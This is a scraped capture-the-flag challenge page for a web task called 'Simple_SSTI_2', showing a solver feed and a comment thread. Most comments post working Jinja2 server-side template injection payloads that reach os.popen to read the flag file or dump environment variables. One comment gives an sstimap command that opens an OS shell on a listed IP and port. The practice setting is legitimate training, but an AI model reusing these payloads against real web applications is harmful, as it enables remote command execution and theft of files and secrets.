Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16329
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
欧阳凌风 攻破了该题 1小时前
刘德龙 攻破了该题 5小时前
何林凤 攻破了该题 5小时前
莫泽明 攻破了该题 5小时前
潘福演 攻破了该题 5小时前
蒙亮江 攻破了该题 6小时前
coap012 攻破了该题 7小时前
凌晨两点半 攻破了该题 7小时前
黎悦依 攻破了该题 8小时前
qiezi 攻破了该题 19小时前
834bug 攻破了该题 19小时前
木秀于林 攻破了该题 20小时前
农群丹 攻破了该题 22小时前
05su 攻破了该题 1天前
YTT 攻破了该题 1天前
严晓颖 攻破了该题 1天前
黄萌 攻破了该题 1天前
HHHHYY 攻破了该题 1天前
卢思杏 攻破了该题 1天前
评论
网恋秀牛子被录屏导致自卑 13天前
举报
/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}
liutong27 4月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 6月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 9月前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 9月前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 1年前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 1年前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 1年前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}
不会写代码的菜鸟 1年前
举报
大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀
qingchuan 1年前
举报
因为没有import os,os是未定义的
q1152874733 1年前
举报
http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}